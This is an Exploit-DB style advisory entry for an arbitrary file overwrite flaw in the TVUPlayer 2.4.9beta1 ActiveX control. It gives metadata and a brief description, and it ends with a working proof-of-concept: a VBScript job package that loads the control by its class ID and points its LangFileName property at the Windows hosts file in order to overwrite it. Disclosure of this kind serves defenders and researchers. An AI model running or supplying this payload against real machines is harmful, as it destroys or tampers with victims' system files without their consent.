header-logo
Suggest Exploit
vendor:
TVUPlayer
by:
Unknown
5.5
CVSS
MEDIUM
Arbitrary File Overwrite
Unknown
CWE
Product Name: TVUPlayer
Affected Version From: TVUPlayer 2.4.9beta1 [build1797]
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

TVUPlayer ActiveX control arbitrary file overwrite vulnerability

The TVUPlayer ActiveX control in TVUPlayer 2.4.9beta1 allows attackers to overwrite arbitrary local files on the victim's computer through a crafted XML package. This vulnerability can be exploited in the context of the vulnerable application, typically Internet Explorer, using the ActiveX control.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39956/info

TVUPlayer ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application, typically Internet Explorer, using the ActiveX control.

TVUPlayer 2.4.9beta1 [build1797] is vulnerable; other versions may be affected. 

<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8' id='target' /> <script language='vbscript'> 'File Generated by COMRaider v0.0.133 - http://labs.idefense.com 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:\Program Files\Online TV Player 4\PlayerOcx.ocx" prototype = "Property Let LangFileName As String" memberName = "LangFileName" progid = "PlayerOcx.FormPlayer" argCount = 1 arg1="C:\WINDOWS\system32\drivers\etc\hosts" target.LangFileName = arg1 </script></job></package>